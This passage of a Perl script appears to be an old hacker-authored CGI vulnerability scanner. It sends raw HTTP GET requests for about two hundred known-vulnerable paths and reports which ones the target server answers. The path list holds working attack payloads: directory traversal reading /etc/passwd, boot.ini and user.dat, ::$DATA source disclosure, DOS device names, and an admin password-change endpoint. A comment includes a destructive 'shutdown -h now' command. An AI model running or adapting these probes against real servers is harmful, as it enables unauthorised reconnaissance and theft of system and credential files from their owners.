"/iissamples/exair/search/advsearch.asp HTTP/1.0\n\n", "/iisadmpwd/aexp2.htr HTTP/1.0\n\n","/adsamples/config/site.csc HTTP/1.0\n\n", "/doc HTTP/1.0\n\n","/.html/............../config.sys HTTP/1.0\n\n", "/cgi-bin/add_ftp.cgi HTTP/1.0\n\n", "/cgi-bin/architext_query.cgi HTTP/1.0\n\n", "/cgi-bin/w3-msql/ HTTP/1.0\n\n","/cgi-bin/bigconf.cgi HTTP/1.0\n\n","/cgi-bin/get32.exe HTTP/1.0\n\n", "/cgi-bin/alibaba.pl HTTP/1.0\n\n","/cgi-bin/tst.bat HTTP/1.0\n\n", "/status HTTP/1.0\n\n","/cgi-bin/search.cgi HTTP/1.0\n\n", "/scripts/samples/search/webhits.exe HTTP/1.0\n\n", "/aux HTTP/1.0\n\n","/com1 HTTP/1.0\n\n","/com2 HTTP/1.0\n\n", "/com3 HTTP/1.0\n\n","/lpt HTTP/1.0\n\n", "/con HTTP/1.0\n\n","/ss.cfg HTTP/1.0\n\n", "/ncl_items.html HTTP/1.0\n\n","/scripts/submit.cgi HTTP/1.0\n\n", "/adminlogin?RCpage=/sysadmin/index.stm HTTP/1.0\n\n", "/scripts/srchadm/admin.idq HTTP/1.0\n\n","/samples/search/webhits.exe HTTP/1.0\n\n", "/secure/.htaccess HTTP/1.0\n\n","/secure/.wwwacl HTTP/1.0\n\n", "/adsamples/config/site.csc HTTP/1.0\n\n","/officescan/cgi/jdkRqNotify.exe HTTP/1.0\n\n", "/ASPSamp/AdvWorks/equipment/catalog_type.asp HTTP/1.0\n\n", "/AdvWorks/equipment/catalog_type.asp HTTP/1.0\n\n", "/tools/newdsn.exe HTTP/1.0\n\n","/scripts/iisadmin/ism.dll HTTP/1.0\n\n", "/scripts/uploadn.asp HTTP/1.0\n\n","/scripts/uploadx.asp HTTP/1.0\n\n", "/scripts/upload.asp HTTP/1.0\n\n","/scripts/repost.asp HTTP/1.0\n\n", "/scripts/postinfo.asp HTTP/1.0\n\n","/scripts/iisadmin/default.htm HTTP/1.0\n\n", "/scripts/samples/details.idc HTTP/1.0\n\n", "/scripts/samples/ctguestb.idc HTTP/1.0\n\n","/scripts/convert.bas HTTP/1.0\n\n", "/scripts/Fpadmcgi.exe HTTP/1.0\n\n","/samples/isapi/srch.htm HTTP/1.0\n\n", "/index.asp::\$DATA HTTP/1.0\n\n","/main.asp%81 HTTP/1.0\n\n", "/domlog.nsf HTTP/1.0\n\n","/log.nsf HTTP/1.0\n\n", "/catalog.nsf HTTP/1.0\n\n","/names.nsf HTTP/1.0\n\n", "/domcfg.nsf HTTP/1.0\n\n","/today.nsf HTTP/1.0\n\n", "/cgi-bin/pfdispaly.cgi HTTP/1.0\n\n","/cgi-bin/input.bat HTTP/1.0\n\n", "/CFIDE/Administrator/startstop.html HTTP/1.0\n\n","/GetFile.cfm HTTP/1.0\n\n", "/../../config.sys HTTP/1.0\n\n","/orders/import.txt HTTP/1.0\n\n", "/config/import.txt HTTP/1.0\n\n","/orders/checks.txt HTTP/1.0\n\n", "/config/check.txt HTTP/1.0\n\n","/webcart/ HTTP/1.0\n\n", "/msadc/samples/adctest.asp HTTP/1.0\n\n","/admisapi/fpadmin.htm HTTP/1.0\n\n", "/admcgi/contents.htm HTTP/1.0\n\n","/_private/form_results.txt HTTP/1.0\n\n", "/_private/form_results.htm HTTP/1.0\n\n","/_private/register.htm HTTP/1.0\n\n", "/_vti_pvt/service.cnf HTTP/1.0\n\n","/_vti_pvt/service.stp HTTP/1.0\n\n", "/_vti_pvt/services.cnf HTTP/1.0\n\n","/_vti_pvt/svcacl.cnf HTTP/1.0\n\n", "/_vti_pvt/writeto.cnf HTTP/1.0\n\n","/_vti_pvt/access.cnf HTTP/1.0\n\n", "/_vti_bin/_vti_aut/author.exe HTTP/1.0\n\n", "/_vti_bin/_vti_aut/author.dll HTTP/1.0\n\n","/cgi-bin/AnForm2 HTTP/1.0\n\n", "/cgi-bin/calendar HTTP/1.0\n\n","/cgi-bin/redirect HTTP/1.0\n\n", "/cgi-bin/w3tvars.pm HTTP/1.0\n\n", "/cgi-bin/w2-msql HTTP/1.0\n\n","/cgi-bin/wais.pl HTTP/1.0\n\n", "/cgi-win/wwwuploader.exe HTTP/1.0\n\n","/cgi-bin/MachineInfo HTTP/1.0\n\n", "/cgi-bin/snorkerz.cmd HTTP/1.0\n\n","/cgi-bin/snorkerz.bat HTTP/1.0\n\n", "/cgi-bin/dig.cgi HTTP/1.0\n\n","/cgi-bin/AT-generate.cgi HTTP/1.0\n\n", "/con/con HTTP/1.0\n\n","/......../ HTTP/1.0\n\n", "/cgi-shl/win-c-sample.exe HTTP/1.0\n\n","../.. HTTP/1.0\n\n", "/cgi-bin/classified.cgi HTTP/1.0\n\n","/cgi-bin/download.cgi HTTP/1.0\n\n", "../../boot.ini HTTP/1.0\n\n","/default.asp. HTTP/1.0 HTTP/1.0\n\n", "/xxxxxxx.....xxxxxxxxx/ HTTP/1.0\n\n","/cgi-bin/testcgi.exe HTTP/1.0\n\n", "/cgi-bin/FormHandler.cgi HTTP/1.0\n\n","/cgi-bin/cgitest.exe HTTP/1.0\n\n", "/cgi-bin/meta.pl HTTP/1.0\n\n","/cgi-bin/test-cgi.tcl HTTP/1.0\n\n", "/cgi-bin/day5datacopier.cgi HTTP/1.0\n\n", "/cgi-bin/test.bat HTTP/1.0\n\n", "/cgi-bin/hello.bat HTTP/1.0\n\n","/cgi-bin/webutils.pl HTTP/1.0\n\n", "/cgi-bin/tigvote.cgi HTTP/1.0\n\n","/cgi-dos/args.cmd HTTP/1.0\n\n", "/neowebscript/test/senvironment.nhtml HTTP/1.0\n\n", "/neowebscript/tests/load_webenv.nhtml HTTP/1.0\n\n", "/neowebscript/tests/mailtest.nhtml HTTP/1.0\n\n", "/WebSTART%20LOG HTTP/1.0\n\n","/cgi-bin/webwho.pl HTTP/1.0\n\n", "/cgi-bin/htsearch HTTP/1.0\n\n","/cgi-bin/plusmail HTTP/1.0\n\n", "/cgi-bin/dig.cgi HTTP/1.0\n\n","/cgi-bin/rmp_query HTTP/1.0\n\n", "/cgi-bin/search.cgi HTTP/1.0\n\n","/cgi-bin/w3-msql HTTP/1.0\n\n", "/cgi-bin/tpgnrock HTTP/1.0\n\n","/manage/cgi/cgiproc HTTP/1.0\n\n", "/_vti_bin/_vti_aut/dvwssr.dll HTTP/1.0\n\n","/scripts/cart32.exe HTTP/1.0\n\n", "/cgi-bin/ultraboard.cgi HTTP/1.0\n\n","/cgi-bin/ultraboard.pl HTTP/1.0\n\n", "/scripts/cart32.exe/cart32clientlist HTTP/1.0\n\n", "/scripts/c32web.exe/ChangeAdminPassword HTTP/1.0\n\n", "/scripts/c32web.exe HTTP/1.0\n\n", "/cgi-bin/form.cgi HTTP/1.0\n\n","/cgi-bin/message.cgi HTTP/1.0\n\n", "/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi HTTP/1.0\n\n", "/cgi-bin/.fhp HTTP/1.0\n\n","/cgi-bin/excite HTTP/1.0\n\n", "/cgi-bin/getdoc.cgi HTTP/1.0\n\n","/cgi-bin/webplus HTTP/1.0\n\n", "/cgi-bin/bizdb1-search.cgi HTTP/1.0\n\n","/cgi-bin/cart.pl HTTP/1.0\n\n", "/cgi-bin/maillist.pl HTTP/1.0\n\n","/cgi-bin/fpexplore.exe HTTP/1.0\n\n", "/cgi-bin/whois.cgi HTTP/1.0\n\n","/cgi-bin/GW5/GWWEB.EXE HTTP/1.0\n\n", "/cgi-bin/search/tidfinder.cgi HTTP/1.0\n\n", "/cgi-bin/tablebuild.pl HTTP/1.0\n\n","/cgi-bin/displayTC.pl HTTP/1.0\n\n", "/cgi-bin/cvsweb/src/usr.bin/rdist/expand.c HTTP/1.0\n\n","/cgi-bin/c_download.cgi HTTP/1.0\n\n", "/cgi-bin/ntitar.pl HTTP/1.0\n\n","/cgi-bin/enter.cgi HTTP/1.0\n\n", "/cgi-bin/printenv HTTP/1.0\n\n","/cgi-bin/dasp/fm_shell.asp HTTP/1.0", "/cgi-bin/cgiback.cgi HTTP/1.0\n\n","/cgi-bin/infosrch.cgi HTTP/1.0\n\n", "/_vti_bin/_vti_aut/author.dll HTTP/1.0\n\n","/scripts/webbbs.exe HTTP/1.0\n\n", "/config/mountain.cfg HTTP/1.0\n\n","/orders/mountain.cfg HTTP/1.0\n\n", "/admin.php3 HTTP/1.0\n\n","/code.php3 HTTP/1.0\n\n", "/bb-dnbd/bb-hist.sh HTTP/1.0\n\n","/reviews/newpro.cgi HTTP/1.0\n\n", "/eatme.idc HTTP/1.0\n\n","/eatme.ida HTTP/1.0\n\n", "/eatme.pl HTTP/1.0\n\n","/eatme.idq HTTP/1.0\n\n", "/eatme.idw HTTP/1.0\n\n","/status.cgi HTTP/1.0\n\n", "/PSUser/PSCOErrPage.htm HTTP/1.0\n\n","/log HTTP/1.0\n\n", "/stats HTTP/1.0\n\n","/piranha/secure/passwd.php3 HTTP/1.0\n\n", "/cgi-bin/sojourn.cgi HTTP/1.0\n\n","/cgi-bin/ews HTTP/1.0\n\n", "/cgi-bin/dfire.cgi HTTP/1.0\n\n","/cgi-bin/spin_client.cgi HTTP/1.0\n\n", "/cgi-bin/echo.bat HTTP/1.0\n\n","/cgi-bin/post32.exe HTTP/1.0\n\n", "/cgi-bin/post16.exe HTTP/1.0\n\n","/cgi-bin/get16.exe HTTP/1.0\n\n", "/cgi-bin/bb-hostsvc.sh HTTP/1.0\n\n","/cgi-bin/config.pm HTTP/1.0\n\n", "/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi HTTP/1.0\n\n", "/%2E%2E/file.dat HTTP/1.0\n\n","/%2E%2E/%2E%2E/windows/user.dat HTTP/1.0\n\n", "/%2E%2E/%2E%2E/Program%20Files/AnalogX/ HTTP/1.0\n\n", "/login.jsp HTTP/1.0\n\n","/*.shtml/login.jsp HTTP/1.0\n\n", "/ConsoleHelp/login.jsp HTTP/1.0\n\n","/.... HTTP/1.0\n\n", "/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3 HTTP/1.0\n\n", "/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1 HTTP/1.0\n\n", "/php-nuke.php3 HTTP/1.0\n\n", "/cgibin/htgrep/file=index.html&hdr=/etc/passwd HTTP/1.0\n\n", "/form-totaller/form-totaller.cgi HTTP/1.0\n\n","/cgi-auth/userreg.cgi HTTP/1.0\n\n", "/cgi-bin/multihtml.pl?multi=/etc/passwd%00html HTTP/1.0\n\n","/siteman000510/siteman.php3 HTTP/1.0\n\n", "/products/phpPhotoAlbum/explorer.php?folder=../../../../../../../etc/ HTTP/1.0\n\n", "/search.dll?search?query=%00&logic=AND HTTP/1.0\n\n","/search.dll?search?query=/&logic=AND HTTP/1.0\n\n", "/cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../etc/passwd HTTP/1.0\n\n", "/ddrint/bin/ddicgi.exe? HTTP/1.0\n\n","/cp/rac/nsManager.cgi?Language=english HTTP/1.0\n\n", "/holateestoyh4x0riando/visita/si/pagina/en/www.raza-mexicana.org HTTP/1.0\n\n" ); foreach $aa (@cgis){ chomp($aa); chomp($aa); @buf=raw("GET $aa\n\r\n\r"); print "$b Probando $v $aa $b>>>"; #print "@buf"; foreach $bb (@buf){ if($bb=~ /HTTP\/1.1 200 OK/) {print "$x YES! $b\n";last;} if($bb=~ /HTTP\/1.1 404 Not Found/ || $bb=~ /HTTP\/1.1 400/){ print "$a No! $b\n"; last;} if($bb=~ /HTTP\/1.1 403/) {print "$a Forbiden $b\n"; last;} } } sub raw{ my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die "Cant make socket\n"; if(connect(S,pack "SnA4x8",2,$port,$pepe)){ my @in=""; select(S); $|=1; print $pstr; while(<S>) { push @in,$_; last if ($line=~ /^[\r\n]+$/ );} select(STDOUT); return @in; } else { die("cant connect\n"); } } ## sub raw from rain forest puppy. ########################################################################### # Coded By ^Kebracho^ # # system("shutdown -h now"); # # NeTdOrK # ########################################################################### [txt escrito con pico porque Powertech dice que es elite]